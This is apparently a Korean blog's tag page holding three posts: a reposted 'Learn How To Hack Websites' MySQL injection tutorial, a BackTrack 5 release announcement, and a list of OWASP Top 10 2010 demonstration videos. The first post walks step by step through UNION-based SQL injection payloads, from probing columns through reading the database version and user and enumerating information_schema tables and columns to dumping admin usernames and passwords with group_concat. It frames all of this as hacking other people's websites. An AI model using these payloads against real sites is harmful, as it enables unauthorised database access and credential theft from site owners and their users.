'injection'에 해당되는 글 7건

  1. 2012.06.20 MySQL Injection : Step By Step Tutorial
  2. 2011.05.11 BackTrack 5 Release (revolution)
  3. 2011.02.08 OWASP Top 10 2010 시연 동영상
2012.06.20 19:57

MySQL Injection : Step By Step Tutorial

Learn How To Hack Websites , Mysql Injection Step by Step Tutorial

SQL Injection in MySQL Databases
SQL Injection attacks are code injections that exploit the database layer of the application. This is most commonly the MySQL database, but there are techniques to carry out this attack in otherdatabases such as Oracle. In this tutorial i will be showing you the steps to carry out the attack on a MySQL Database.

Step 1: 

When testing a website for SQL Injection vulnerabilities, you need to find a page that looks like this: 


Basically the site needs to have an = then a number or a string, but most commonly a number. Once you have found a page like this, we test for vulnerability by simply entering a ' after the number in the url. For example: 

If the database is vulnerable, the page will spit out a MySQL error such as; 

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/wwwprof/public_html/readnews.php on line 29 

If the page loads as normal then the database is not vulnerable, and the website is not vulnerable to SQL Injection. 

Step 2 

Now we need to find the number of union columns in the database. We do this using the "order by" command. We do this by entering "order by 1--", "order by 2--" and so on until we receive a page error. For example: 

www.site.com/page=1 order by 1-- 
http://www.site.com/page=1 order by 2-- 
http://www.site.com/page=1 order by 3-- 
http://www.site.com/page=1 order by 4-- 
http://www.site.com/page=1 order by 5--
If we receive another MySQL error here, then that means we have 4 columns. If the site errored on "order by 9" then we would have 8 columns. If this does not work, instead of -- after the number, change it with /*, as they are two difference prefixes and if one works the other tends not too. It just depends on the way the database is configured as to which prefix is used. 

Step 3

We now are going to use the "union" command to find the vulnerable columns. So we enter after the url, union all select (number of columns)--, 
for example: 
www.site.com/page=1 union all select 1,2,3,4-- 

This is what we would enter if we have 4 columns. If you have 7 columns you would put,union all select 1,2,3,4,5,6,7-- If this is done successfully the page should show a couple of numbers somewhere on the page. For example, 2 and 3. This means columns 2 and 3 are vulnerable. 

Step 4 

We now need to find the database version, name and user. We do this by replacing the vulnerable column numbers with the following commands: 
or if these dont work try... 

For example the url would look like: 
www.site.com/page=1 union all select 1,user(),version(),4-- 

The resulting page would then show the database user and then the MySQL version. For example admin@localhost and MySQL 5.0.83. 
IMPORTANT: If the version is 5 and above read on to carry out the attack, if it is 4 and below, you have to brute force or guess the table and column names, programs can be used to do this. 

Step 5 

In this step our aim is to list all the table names in the database. To do this we enter the following command after the url. 
UNION SELECT 1,table_name,3,4 FROM information_schema.tables-- 
So the url would look like: 
www.site.com/page=1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables-- 

Remember the "table_name" goes in the vulnerable column number you found earlier. If this command is entered correctly, the page should show all the tables in the database, so look for tables that may contain useful information such as passwords, so look for admin tables or member or user tables. 

Step 6 
In this Step we want to list all the column names in the database, to do this we use the following command: 

union all select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema=database()--
So the url would look like this: 
www.site.com/page=1 union all select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema=database()-- 
This command makes the page spit out ALL the column names in the database. So again, look for interesting names such as user,email and password. 

Step 7 

Finally we need to dump the data, so say we want to get the "username" and "password" fields, fromtable "admin" we would use the following command, 
union all select 1,2,group_concat(username,0x3a,password),4 from admin-- 
So the url would look like this: 
www.site.com/page=1 union all select 1,2,group_concat(username,0x3a,password),4 from admin-- 

Here the "concat" command matches up the username with the password so you dont have to guess, if this command is successful then you should be presented with a page full of usernames and passwords from the website 

출처 : http://www.devilscafe.in/

Trackback 0 Comment 0
2011.05.11 10:00

BackTrack 5 Release (revolution)

The BackTrack Dev team has worked furiously in the past months on BackTrack 5, code name “revolution”. Today, we are proud to release our work to the public, and then rest for a couple of weeks. 

This new revision has been built from scratch, and boasts several major improvements over all our previous releases. 

Based on Ubuntu Lucid LTS. Kernel 2.6.38, patched with all relevant wireless injection patches. Fully open source and GPL compliant. Head down to our downloads page to get your copy now! 

We would like to take this opportunity to thank several key individuals who have helped make this release possible:
  • Offensive-Security who have played a major role in development and funding of our project.
  • Devon Kearns – A new member in our BackTrack team who single-handedly covered more packages than the whole team put together. At some stage we considered renaming the release to “dookie-track”.
  • Shadz – Master of the dragon and creator of the promo movie. Check him out at http://www.zusedesign.com/
  • Digip – Master of our website and dang good artist – http://ticktockcomputers.com
  • Elwood – For getting an awesome forensics environment up. Thanks!
  • Mister_X – For going through our wireless setup and making sure everything was sparkling.
  • Bolexxx – our torrent and download master. Your download is due to him.
I would also like to personally thank each member of the BackTrack Dev team for putting the effort required to make this great release. Stay tuned to our Forums and Wiki for updates, howtos and bug fixes for BackTrack 5. These resources will grow significantly in the next couple of weeks. 

Head down to the downloads page and get your copy of BackTrack 5!

다운로드 : http://www.backtrack-linux.org/downloads/

Trackback 0 Comment 0
2011.02.08 19:50

OWASP Top 10 2010 시연 동영상

OWASP Top 10 2010: A1 - Injection
OWASP Top 10 2010: A2 - Cross Site Scripting
OWASP Top 10 2010: A3 - Broken Authentication and Session Management
OWASP Top 10 2010: A4 - Insecure Direct Object References
OWASP Top 10 2010: A5 - Cross-Site Request Forgery (CSRF)
OWASP Top 10 2010: A6 - Security Misconfiguration
OWASP Top 10 2010: A7 - Insecure Cryptographic Storage
OWASP Top 10 2010: A8 - Failure to Restrict URL Access
OWASP Top 10 2010: A9 - Insufficient Transport Layer Protection
OWASP Top 10 2010: A10 - Unvalidated Redirects and Forwards

만든이: ConvisoITSecurity

Trackback 0 Comment 0